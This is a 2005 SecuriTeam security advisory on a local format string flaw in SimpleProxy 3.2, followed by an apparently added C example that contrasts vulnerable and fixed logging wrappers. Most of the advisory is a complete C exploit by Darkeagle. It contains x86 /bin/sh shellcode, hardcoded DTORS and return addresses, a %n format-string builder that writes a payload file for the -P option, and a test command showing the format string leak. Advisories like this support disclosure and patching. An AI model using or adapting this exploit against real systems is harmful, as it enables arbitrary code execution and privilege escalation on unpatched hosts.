[EXPL] SimpleProxy Local Format String (Exploit)

From: SecuriTeam (support_at_securiteam.com)
Date: 09/01/05

    To: list@securiteam.com
    Date: 1 Sep 2005 09:34:27 +0200

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

      SimpleProxy Local Format String (Exploit)
    ------------------------------------------------------------------------

    SUMMARY

    " <http://www.sourceforge.net/projects/simpleproxy> simpleproxy acts as a
    simple TCP proxy. It opens a listening socket on the local machine and
    forwards any connection to a remote host. It can be run as a daemon or
    through inetd."

    Because user-provided data is passed to a logging call as the format
    argument, an attacker can supply the program with a format string, which
    in turn can be used to execute arbitrary code.

    DETAILS

    Vulnerable Systems:
     * SimpleProxy version 3.2

    Exploit:
    /*
    \ SimpleProxy 3.2 local format string exploit
    -/ by Darkeagle
    \
    -/ syslog() function in simpleproxy.c
    *
    *++++++++++++++++++++++++++++++++++++++++
     static void log(int type, char *format, ...)
     {
     ...
     #if HAVE_SYSLOG
         syslog(type,buffer);
     ...
     }

    static struct lst_record *load_pop3_list(const char *popfile)
    {
     ...
     if(*str=='\0') continue;
            log(LOG_INFO,"Adding '%s' to POP3 users list",str);
     ...
    }
    *++++++++++++++++++++++++++++++++++++++++
    *

    Other vulnerable calls of the log() function also exist, including a
    remote one.
    One more local one exists in the -P parameter:

    [darkeagle@localhost simpleproxy-3.2]$ ./simpleproxy -L 3337 -R
    localhost:110 -d -v -p1 -f sample.cfg -P AAAA%8$\x
    [darkeagle@localhost simpleproxy-3.2]$ tail -2 /var/log/syslog
    Aug 27 00:14:05 localhost simpleproxy[5755]: Can't open POP3 file:
    AAAA4141203a
    Aug 27 00:14:05 localhost simpleproxy[5756]: Error binding socket.
    [darkeagle@localhost simpleproxy-3.2]$

    Very easy to exploit.

    To exploit simpleproxy, pass 'popa3d.txt' as the value of the -P parameter.
    The bug was corrected in the latest version (3.4).
    Enough.
    \
    -/
    \
    -/
    \
    -/
    */

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>

    // We must begun !!!

    #define doit( b0, b1, b2, b3, addr ) { \
                 b0 = (addr >> 24) & 0xff; \
                 b1 = (addr >> 16) & 0xff; \
                 b2 = (addr >> 8) & 0xff; \
                 b3 = (addr ) & 0xff; \
    }

    char
    shellcode[]=
            "\x31\xc0"
            "\x31\xdb"
            "\x31\xc9"
            "\xb0\x46"
            "\xcd\x80"
            "\x31\xc0"
            "\x50"
            "\x68\x2f\x2f\x73\x68"
            "\x68\x2f\x62\x69\x6e"
            "\x89\xe3"
            "\x8d\x54\x24\x08"
            "\x50"
            "\x53"
            "\x8d\x0c\x24"
            "\xb0\x0b"
            "\xcd\x80"
            "\x31\xc0"
            "\xb0\x01"
            "\xcd\x80";

    char *
    evil_builder( unsigned int retaddr, unsigned int offset, unsigned int
    base, long figure )
    {
      char * buf;
      unsigned char b0, b1, b2, b3;
      int start = 256;

      doit( b0, b1, b2, b3, retaddr );
      buf = (char *)malloc(999);
      memset( buf, 0, 999 );

     b3 -= figure;
     b2 -= figure;
     b1 -= figure;
     b0 -= figure;

     snprintf( buf, 999,
               "%%%dx%%%d$n%%%dx%%%d$n%%%dx%%%d$n%%%dx%%%d$n",
                 b3 - (sizeof( size_t ) * 4) + start - base, offset,
                 b2 - b3 + start, offset + 1,
                 b1 - b2 + start, offset + 2,
                 b0 - b1 + start, offset + 3 );

      return buf;
    }

    int
    main( int argc, char * argv[] )
    {
      char * fmt;
      char endian[555];
      unsigned long locaddr, retaddr;
      unsigned int offset, base;
      unsigned char b0, b1, b2, b3;
      FILE *file;

      memset( endian, 0, 555 );

      file = fopen("popa3d.txt", "w+");

      locaddr = 0x804ce20; // dtorz addrz :=)
      retaddr = 0xbfffec54; // shellcode addr
      offset = 5;
      locaddr += 0x4; // dtorz+0x4

      doit( b0, b1, b2, b3, locaddr );

      base = 4;

      snprintf( endian, sizeof(endian),
                "%c%c%c%c"
                "%c%c%c%c"
                "%c%c%c%c"
                "%c%c%c%c",
                 b3, b2, b1, b0,
                 b3 + 1, b2, b1, b0,
                 b3 + 2, b2, b1, b0,
                 b3 + 3, b2, b1, b0 );

     fmt = evil_builder( retaddr, offset, base, 0x4 );
        
     memset(fmt+strlen(fmt), 0x42, 48);
     strcat(fmt, shellcode);
     strcat(endian, fmt);
     fprintf(file, "%s", endian);
     return 0;
    }

    /* EoF */
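The logging pattern behind this bug, rebuilt as an added C example (it is not part of the advisory and not simpleproxy's own source): a wrapper in the shape of the log() excerpt above hands its already-formatted buffer to the backend as the format argument, beside the corrected wrapper that passes the buffer as data behind a fixed "%s". The backend here is a stand-in for syslog(3) that only records the format it was given and expands nothing but the trusted "%s", so the program never interprets user-supplied directives; the function names, the directive counter and the sample POP3 user-list entry are assumptions constructed for this example.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

/* Number of conversion directives in a printf-style format string;
 * "%%" is a literal percent sign and is not counted. */
int count_format_directives(const char *s)
{
    int n = 0;
    for (; *s; s++) {
        if (*s != '%')
            continue;
        if (s[1] == '%') {      /* escaped percent sign */
            s++;
            continue;
        }
        n++;
    }
    return n;
}

/* Stand-in for syslog(3) (assumption for this example).  It records the
 * format string it was handed and renders the message so the caller can
 * inspect what reached the backend.  Only the trusted "%s" format is
 * expanded; any other format (data misused as a format) is copied
 * verbatim, which keeps the example free of undefined behaviour. */
static char last_format[512];
static char last_message[512];

static void backend_log(int priority, const char *format, ...)
{
    va_list ap;
    (void)priority;
    snprintf(last_format, sizeof last_format, "%s", format);
    va_start(ap, format);
    if (strcmp(format, "%s") == 0)
        snprintf(last_message, sizeof last_message, "%s",
                 va_arg(ap, const char *));
    else
        snprintf(last_message, sizeof last_message, "%s", format);
    va_end(ap);
}

/* Vulnerable shape from the excerpt: the formatted buffer, which now
 * contains user data, is passed as the backend's format argument. */
void log_vulnerable(int type, const char *format, ...)
{
    char buffer[256];
    va_list ap;
    va_start(ap, format);
    vsnprintf(buffer, sizeof buffer, format, ap);
    va_end(ap);
    backend_log(type, buffer);          /* user data becomes the format */
}

/* Fixed shape: the buffer travels as an argument behind a fixed format,
 * so '%' characters in user data are never interpreted. */
void log_fixed(int type, const char *format, ...)
{
    char buffer[256];
    va_list ap;
    va_start(ap, format);
    vsnprintf(buffer, sizeof buffer, format, ap);
    va_end(ap);
    backend_log(type, "%s", buffer);
}

/* Directives the backend was asked to interpret on the last call.  With
 * the fixed wrapper this is always 1 (the programmer's own "%s"); with the
 * vulnerable wrapper it rises and falls with the user data. */
int directives_reaching_backend(void)
{
    return count_format_directives(last_format);
}

const char *last_logged_message(void)
{
    return last_message;
}

int main(void)
{
    /* Constructed sample: a user-list entry containing '%' characters, the
     * kind of line load_pop3_list() reads from the file named by -P. */
    const char *entry = "alice%x%x%n";

    log_vulnerable(6 /* LOG_INFO */, "Adding '%s' to POP3 users list", entry);
    printf("vulnerable: %d directive(s) reached the backend\n",
           directives_reaching_backend());

    log_fixed(6, "Adding '%s' to POP3 users list", entry);
    printf("fixed:      %d directive(s) reached the backend: %s\n",
           directives_reaching_backend(), last_logged_message());
    return 0;
}
```

The same check explains the -P observation in the exploit header: an argument such as AAAA%8$x scores one directive, and with the vulnerable wrapper that directive is handed to syslog intact. A quick audit rule for a code base is therefore that every call into a printf-style backend uses a string literal as its format; compilers flag the non-literal case with -Wformat-security.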

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:eagle@exploiterz.org>
    Darkeagle.
    The original article can be found at:
    <http://exploiterz.org/simpleprx-exp.c>


